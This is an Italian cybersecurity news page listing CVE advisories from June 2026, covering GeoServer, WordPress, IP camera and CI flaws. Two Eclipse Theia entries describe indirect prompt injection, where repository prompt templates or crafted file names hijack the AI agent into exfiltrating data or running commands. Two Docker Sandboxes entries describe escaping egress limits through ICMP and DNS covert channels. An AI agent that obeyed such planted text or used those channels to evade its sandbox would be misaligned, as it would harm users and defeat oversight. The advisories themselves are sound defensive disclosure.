Cybersecurity & Regolamentazione UE

News & Sicurezza

Aggiornamenti da ENISA, NVD e le principali fonti di cybersecurity europee. Tutto quello che un Responsabile Tecnico deve sapere.

25084 risultati

VulnerabilitàAlta
CVE-2025-52465 - GeoServer has an arbitrary file write vulnerability in its Master Password Dump Page

CVE ID :CVE-2025-52465 Published : June 18, 2026, 2:28 p.m. | 1 hour, 14 minutes ago Description :GeoServer is an open source server that allows users to share and edit geospatial data. Prior to versions 2.26.4 and 2.27.3, a vulnerability exists that allows an authenticated administrator with access to GeoServer's security system to pass arbitrary file names to the Master Password Dump web page and create files containing the master password in plaintext. The provided file name must be an absolute path to the target file, the target file can not already exist and all parent directories must already exist. Versions 2.26.4 and 2.27.3 contain a fix. GeoServer installations where the web interface is either disabled or completely removed are not affected since the vulnerability exists in one of the web pages. Severity: 0.0 | NA Visit the link for more details, such as CVSS details, affected products, timeline, and more...

CVEfeed CVE18 giu 2026
VulnerabilitàAlta
CVE-2026-46580 - In Eclipse Theia versions prior to 1.71.0, files m

CVE ID :CVE-2026-46580 Published : June 18, 2026, 2:26 p.m. | 1 hour, 15 minutes ago Description :In Eclipse Theia versions prior to 1.71.0, files matching the pattern .prompts/*.prompttemplate in a workspace were automatically loaded and could override or extend the AI agent's system prompts. An attacker could craft a malicious repository containing prompt template files that, when the workspace was opened in Theia, replaced the AI's system instructions with attacker-controlled content (indirect prompt injection). Combined with other AI chat features available in untrusted workspaces, this enabled attack chains leading to data exfiltration via Markdown image rendering or arbitrary command execution via task definitions. Severity: 8.4 | HIGH Visit the link for more details, such as CVSS details, affected products, timeline, and more...

CVEfeed CVE18 giu 2026
VulnerabilitàAlta
CVE-2025-27511 - GeoServer DB2 DataStore Extension has a JNDI Vulnerability via Store Connection

CVE ID :CVE-2025-27511 Published : June 18, 2026, 2:23 p.m. | 1 hour, 19 minutes ago Description :GeoServer is an open source server that allows users to share and edit geospatial data. Prior to version 2.27.0 of the GeoServer DB2 DataStore Extension, an administrator can perform a JNDI attack through specially crafted DB2 jdbc url leading to to Remote Code Execution (RCE). Version 2.27.0 fixes the issue. Severity: 0.0 | NA Visit the link for more details, such as CVSS details, affected products, timeline, and more...

CVEfeed CVE18 giu 2026
VulnerabilitàAlta
CVE-2026-44688 - Eclipse Theia Indirect Prompt Injection

CVE ID :CVE-2026-44688 Published : June 18, 2026, 2:22 p.m. | 1 hour, 20 minutes ago Description :In Eclipse Theia versions prior to 1.71.0, the AI chat agent processed workspace file and directory names as part of its prompt context without distinguishing them from system instructions. An attacker could craft a malicious repository with adversarial directory or file names that, when analyzed by the AI agent, would cause the agent to follow attacker-controlled instructions (indirect prompt injection). Combined with other AI chat features available in untrusted workspaces, this enabled attack chains leading to data exfiltration via Markdown image rendering or arbitrary command execution via task definitions. Severity: 8.4 | HIGH Visit the link for more details, such as CVSS details, affected products, timeline, and more...

CVEfeed CVE18 giu 2026
VulnerabilitàCritica
CVE-2026-8024 (CVSS 9.8)

A remote, unauthenticated attacker may exploit a deserialization of untrusted data vulnerability in ibaPDA or ibaDatCoordinator to gain full access to the affected systems.

NVD (NIST)18 giu 2026
VulnerabilitàAlta
CVE-2026-50141 - Woodpecker gRPC agent_id metadata can be spoofed- cross-tenant agent impersonation

CVE ID :CVE-2026-50141 Published : June 18, 2026, 2:13 p.m. | 1 hour, 29 minutes ago Description :Woodpecker is a CI/CD engine. Starting in version 3.0.0 and prior to version 3.14.1, a vulnerability in Woodpecker CI's gRPC layer allowed any authenticated agent to impersonate any other agent on the same server by injecting a forged `agent_id` value into outgoing gRPC metadata. The server correctly verified the JWT token but then discarded the verified agent identity in favor of the client-supplied value. Version 3.14.1 patches the issue. As a workaround, disable org agents (`WOODPECKER_DISABLE_USER_AGENT_REGISTRATION=true`) and delete existing ones. Severity: 0.0 | NA Visit the link for more details, such as CVSS details, affected products, timeline, and more...

CVEfeed CVE18 giu 2026
News
INC Ransomware Emerges as Major RaaS Threat in 2026 with 830+ Victims Since 2023

INC Ransomware Emerges as Major RaaS Threat in 2026 with 830+ Victims Since 2023 Cybersecurity researchers have charted the evolution of INC from an nascent ransomware-as-a-service (RaaS) operation to one of the most prolific cybercrime groups in 2026, claiming no less than 830 vi ... Read more Published Date: Jun 18, 2026 (5 days, 17 hours ago) Vulnerabilities has been mentioned in this article. CVE-2026-11645 CVE-2025-5777 CVE-2024-57727 CVE-2023-48788 CVE-2023-3519

CVEfeed Newsroom18 giu 2026
VulnerabilitàAlta
CVE-2026-9158 - 4diac FORTE Use-After-Free Vulnerability

CVE ID :CVE-2026-9158 Published : June 18, 2026, 2:10 p.m. | 1 hour, 32 minutes ago Description :In Eclipse 4diac FORTE versions 3.0.0 to 3.1.0, a specially crafted DELETE connection command to the management interface can lead to a dangling pointer. This allows subsequent commands to access freed memory (use-after-free). Severity: 5.2 | MEDIUM Visit the link for more details, such as CVSS details, affected products, timeline, and more...

CVEfeed CVE18 giu 2026
VulnerabilitàAlta
CVE-2026-56012 - WordPress Media LIbrary Assistant plugin <= 3.35 - SQL Injection vulnerability

CVE ID :CVE-2026-56012 Published : June 18, 2026, 2:02 p.m. | 1 hour, 40 minutes ago Description :Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in David Lingren Media LIbrary Assistant allows Blind SQL Injection. This issue affects Media LIbrary Assistant: from n/a through 3.35. Severity: 8.5 | HIGH Visit the link for more details, such as CVSS details, affected products, timeline, and more...

CVEfeed CVE18 giu 2026
VulnerabilitàAlta
CVE-2026-12527 - A broken authorization boundary in the RTSP media

CVE ID :CVE-2026-12527 Published : June 18, 2026, 1:55 p.m. | 1 hour, 47 minutes ago Description :A broken authorization boundary in the RTSP media delivery pipeline of Shenzhen Liandian Communication Technology LTD V380 IP Camera firmware AppFHE1_V1.0.6.020230803 enables unauthenticated network actors to bypass the device’s credential-enforced live-view workflow and directly retrieve real-time video stream data. Severity: 6.0 | MEDIUM Visit the link for more details, such as CVSS details, affected products, timeline, and more...

CVEfeed CVE18 giu 2026
VulnerabilitàAlta
CVE-2026-12539 - Docker Sandboxes ICMP egress restriction bypass after daemon restart

CVE ID :CVE-2026-12539 Published : June 18, 2026, 1:51 p.m. | 1 hour, 51 minutes ago Description :Docker Sandboxes (sbx) blocks ICMP egress with an authorizer applied only at network-creation time, and does not re-apply it to networks rebuilt from disk when the Docker daemon restarts, so a restart-surviving sandbox forwards ICMP to arbitrary hosts. A workload inside a sandbox, which the threat model treats as untrusted, can therefore defeat the documented ICMP egress block to perform network reconnaissance and exfiltrate data over an ICMP covert channel, regardless of the configured allowlist. Severity: 5.7 | MEDIUM Visit the link for more details, such as CVSS details, affected products, timeline, and more...

CVEfeed CVE18 giu 2026
VulnerabilitàAlta
CVE-2026-12039 - Docker Sandboxes network egress allowlist bypass via unfiltered DNS resolution

CVE ID :CVE-2026-12039 Published : June 18, 2026, 1:48 p.m. | 1 hour, 54 minutes ago Description :Docker Sandboxes (sbx) enforces an HTTP/S-only egress allowlist but does not apply it to DNS resolution: the per-network embedded DNS server forwards any queried name to the host resolver whenever the network is internet-connected, without consulting the policy. A workload inside a sandbox, which the threat model treats as untrusted, can therefore encode data into DNS labels for an attacker-controlled domain and exfiltrate it through a DNS covert channel, bypassing the configured allowlist. Severity: 5.7 | MEDIUM Visit the link for more details, such as CVSS details, affected products, timeline, and more...

CVEfeed CVE18 giu 2026

Pagina 225 di 2091

Resta aggiornato sulla cybersecurity

Iscriviti a CodersRegistry per ricevere gli aggiornamenti più importanti su regolamentazione EU e vulnerabilità critiche.